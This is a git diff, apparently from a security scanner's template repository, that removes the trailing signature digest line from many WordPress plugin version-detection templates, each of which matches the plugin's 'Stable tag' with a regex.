index 74c5894bab..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d10292f8ed8a9f3b5a08005b72d2bf763cf3e4b606b0f420c2a0fccbae89810e02201dcb72810467d70c4b3c4721475cfe5afef575faeb4e5044da542ec15abfc509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index f2d56b72ba..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022056b77d4e5b296d848bdc3b402a9f8c2bd5b52d39cb9b3016908bf2ea6149a06d0220557817d9290e2c8beb217389166eb727a6aaf76443ef6e8c1ba3c2e816cc5583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index bfa693f52e..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2296541e1d47a5b6aa5966e6559ae60f0f540ad3d2a3ac01a4d626c2ff06e540221008261a1cfce7492c3948b74620bb3bf6ec655f064f58764ef8407c81b64deab71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 7bfcca0ee0..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206753cf1d015adc4ac187628342db1dfe7b4daa2c40a6307fbc7949d2783c364002200660cc2a63c5ad8928f4dcf656e38839407afe3fc68458a595f94aaa50f5ead5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 490a1fbbda..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022059bd3e8555ffe86954cf660bff282cde3d54e935322b7baa22236e03ea1efff0022100a55d5775a9b5195757a552bdf8bc4c640413ee8a9cfa838cc859f8d0ae5d7cb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 99c5cdc49a..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017136fc7f06b1163c68c792dbaab177f2806203b358126f763ef646cf890d543022100f7c1bf824da9d96a796197ef0da650f0cff03dc557da33de00ca9e0ed4a115f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index fbe764126e..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6b837ca9a54dce77a5e4f470b4fc01e71b2d3e6f3f97a03fecfadef6b856f03022075c67fc42cd86216ecb04d1a628f568df7583e18894d9954a04e64d2491a57db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 6e12cc5f56..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1301a67a640666dda200e8c6d1c331e055438476109a6549c4f6c975523f0b8022100c3896e87d77708d12db896f1e77eefda1852f915064152163672429bbc11d677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 7dee749ead..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203246d920e5683a41278f0b83b00471aaac66fd7746a75c4b00e7ca112704e8d00221009b77c445c843f7ea219d05643aaacd80971841fbbab5c16e6ea2a30e8bd1d25a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 5315ffae17..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e162dfb9aa028f8793e4a28bfd7f2ae51f1dbaafef21b2adb5b54e765209116022027aa6376a2e815336a21cc6d0e3b86013933fb68297fddad67c91aea5e2fa9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index aba93bde64..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022003c99003c78431ad6fdc1d3da3e8da386d99abbbf008bf60e5331f89ef7289ed022100d7d34e2f7a529718cb345108636db17fef60b06d865d165ee62b00c1071bd6d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 35c6aca737..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b417f3148399a19a5b02d0cd525176cae74be6ef464abd6593b08730a34801f602203c7819f302c992909681d2306edca21ef6c8d0e1fbab63d928e99eb4eac9add1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a714a83cf5..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f0db8c3d5b0bfef644d7c6bed9eb618a8fd0ef5f3ede6c2a154a124175820ef02207bc66d945596af83b8d84732059eb63eb00d29b0506d99a7247ce16c5fa74452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 0f8e65d595..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024ceef3a175174bb5a046ac70f5a3d026f751081ba6252a437b65bfc393ada7b02201ee73ce20782da5763f0e702b2901a9b42c583405a0683cc0f22f8bd694e53a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index e606da27df..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3df6f8875b86d322fde441d9e9bf1ac8147d3fc2e16dd7d6ba5d7bc5b01e4f302203c2b0f34cd288a039a7876fcfde43c707f95cdd262035bad18765171ddcefc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 3c4b8d7233..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b5e286a6e38b888585cd6e81e7fed586e49920e29669426b6ab0ce03212833402210088b403215160884227ba3b44ba0fbf5a6f6f901676b8dd04c51efe658786b234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 59f3a576a3..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d47172b8cc4d387ab1a4a1a099de6c0ba752c3ebd6c13e69c93642709e3e007022100fc1cd748a79f444eb9b95bcd3209924054ae9ce29362403eb01b7ab02690f6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 100c1f3247..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c703c344c2d3eda76ccb6505429cc22f40449a02ff425d27811c5fe2a885881402207242b463fed517b029d5d236afb5fc17fa76203ac72bcd9bd5c7cda32fd97e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 30075abc53..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100979e636eee391f656123f25e53fa9bc5578e0a5eb55c4cfe8a6beff3b0e01606022100835348fe40515702ae039687e9a0ea9b2c5eaf1abe9241e577da6dd7b20e3db3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 7fe3621ed5..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e0dc16d09c9bdf86b2435bfb1c3b8f5728519c34160581918a4ee2c14c9c2230220087428f3d23dfd66485a97e007bae4974ec0363d4f7607c8cf92d440e3564a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index df1865d431..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220060e1e206ac695b643fc3a00062d0c0a4a4effdffd394ccd9287bf3b7ace3a8802206f790eba87577ec056b20150e69b719d5ecb242ede2a6e45bd46960c4e71ca93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 6f25144d7a..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff8bc475cb96360cd88159552d1a16d5834c478313ea7e4751ba7f716be43044022063c59a58b57746120f1d187b0b0aeb42190b9f19e0132dc2af7fcdd0de3d04f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 8bdd9ff5fd..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220548f429aff480125ad59eb4f3a55abd9004e341c4de73610f01610509b54563e0221009abc41400ed025df88753453ef390dbef34ad7661600d1fa2cb99efeb539393b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 653995dd46..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022046ff97a6aea566a22d41fc274c2d6d3b2c1d6eb7d9a8151dd8cc51756a5b100602203e329b1f25a08da5569308e2b3a2437a55058b8c25c31d2081eb0824f7881895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 9b1b531c2a..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a67999a8f34b89f78dafdea3fd03ee34f112e9d612bab3b65a9c5a7e7a567f060221008da785a09b681da86adc90dc671084fc0f385d7fe7162890ff1f8f11f0ca7285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 23568d16ad..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eef4d5274b6202a91f8a824f97e0aa7b41ccd6cd1fc8e74f9f8f625d9591b8bb0220515fd611c70f9a78488edc3769f2891fb9d6cd68b8e08abd825711b01a5d69f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index c18b71617d..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad807f68c8d344a073a6d796c2b878b7977465bb85ab60a6cdf70cbd64a8d622022100afde7745f538b1f6c86892f71df8b3dd427a5735405021ba72eda4b0a4d8a6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 6c1108caa6..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d27064c086bb7342a00128ed684fdb4eebd1255c0ba0d8792fa605383c6e62c7022100f4130be066fe86663c4ef094bc3cb9354ce8ce46e99eed63bb536e65fc1f430c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index c07ce1aa4f..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab53ee55334b8a73931890e8b1e5d5b3e7ceb56eba2dde633eff03c4805746a1022100943db8300198dd448fd263f192377281d68ded7c83fb201205d933c90714f46c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 8176c98e5f..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202148eeeb3f04ea678f42a1cb1c404979deab862e3452f558f8a70dac1570648a022100bc996b252f2452ec48adb8912a756bcbced7f3128156bdec2242c1d76b74b620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 99783df32e..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d653c207d83df862e04228721919f64217590670f7a37398bfb9a4e916954ed022100f11968222cc71f24d4b244b431c3d6810796bc665cd18b14a07122b2727a1b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index ba44a795fd..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3e37fa65b51fd729fc85b414cfa487c9669ec944bfa78099f29fb1511216e63022100f2218bcf39667ea2574304d545f7b98ccbdcfce7077806fa25eb94619b2bae44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index ea59b59420..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d0a923593822ff0d29917daa1cbb8bdf7c41fe47cbeb9d3d73bcbbb8ec47018b022016927fd78933e1768e752b00393f1950b8a0be4cfe1597601779afb6a4e3e6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 00ba9936cd..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5d6c6a7ac63c2cc08ba609f1645d78898eeca5e1f1662009ef026ad04fab922022100c89b5089086e58771f03e7d3d5848a1215bc28e2ae16a2b58a37486687648e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index b2136ff15a..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000acc83ebfa8bd480806f90d9484826698d249dc982298e1535c7d24f0a84c2f02207693c3f0bccca288ca84c8164e4dac2f77971e71c44a335b5f51ded5e5f9225e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index f168b245e1..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a207cd1b70752b838f3c56979bb0f917751984d4d4ededcc94d5d767643b6d90220072b169383d0d81a129a6c061635df96a0c188b2fa730e899eb4a6bc63d76883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 6685b6e2b5..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf70b05b6f158d4ccfa5e8deb60742e0a1967e26faa00415d48a7dc113360f20022100ed1dc00ddf79e705b38eedc11a0847f40d6bfc427beb928fa2fca8cd3baffafb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 0685750388..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6b0e8a23796358a87c53b5eb4c176c37bbf86d96eeee9ecc8c074d3ed27cc6c022100d26ec955a70170f4d3cf34d4625efd8625b5b9cb1524e2e2b3fbfcdd4dccb2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 4893861a05..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac332c4b17afa222d60f74ef9cad782530929ac09de10e8cb3c3444e6bd01fd10220387908e59ff21d629c5fa15639b32cb3b5037bac32049262f2f034620f5260da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 98d7cf165c..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e87fdfbe0ce09e286b1e932e267a6adecb171efa1bcb17dc5647261a20660d86022100e0d00f5fa2e52d80f1460b002eca7a139ccad7fd1bfe8547277021f66a139f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 956c0e5b65..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202df9732f740eae61adefc3c773c6fcb9636034364ab28cfad2ef607e1851591002200f279d5ff7927c73bca2e534460571e897033b9df2d679e3e962c03555e865b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 4bba6e3236..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba8ce48e4dc781ba08946334beed4326ebf19f83b9b02e64c1bec84ca8679da3022100dfb50cc5210c1313f7be1c05ef6097c80f1990c075e59efea8fa9f36d355fb60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 191db3e7d6..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201de62249a0ee24646ec876a1f84a258120a2a814c937e1a6de12521e6dfd1df302205720a3234711f31b019abc45c0c9d0173cc9748e8a857a94d9b02d8ad609546c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index bb6d549a28..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009391f4c5583b946cd169fb6a3d02238835cd04d3fd8a126a29576e2d59f7ab6a02200ae2dba28c079cefb99a4947e43721154d9c383635d8160ef2542f932b487760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index dba08b2aad..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210094ed24404a60814e4079abe0b2b0d72d1271b3e59d78aefdd2f82ee529cedf92022100b12ad1391408ddba975704bd5ddf56021f9c7b6e8ad2d155a5bd6ebd09360ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 902a6feb34..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205681d9bc9ffc0d57470edc6ee97e007aeda9149f94ed3ab75cba0e3ec2d3cec9022100f93da2db208bd6f0fbf6331e5df823d746c1b9451d4667a7f74c1e92172d0898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index d6110b55d4..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022074a93b4cd30c5c4002706b3198b26882973b91ebe6b95dd91d1dc29a87da38c8022100e59bf1bfdcdb3da575ccced326acc997bc3aacad9141f9e8b4c80defdbf67c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index d0cbb5d890..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 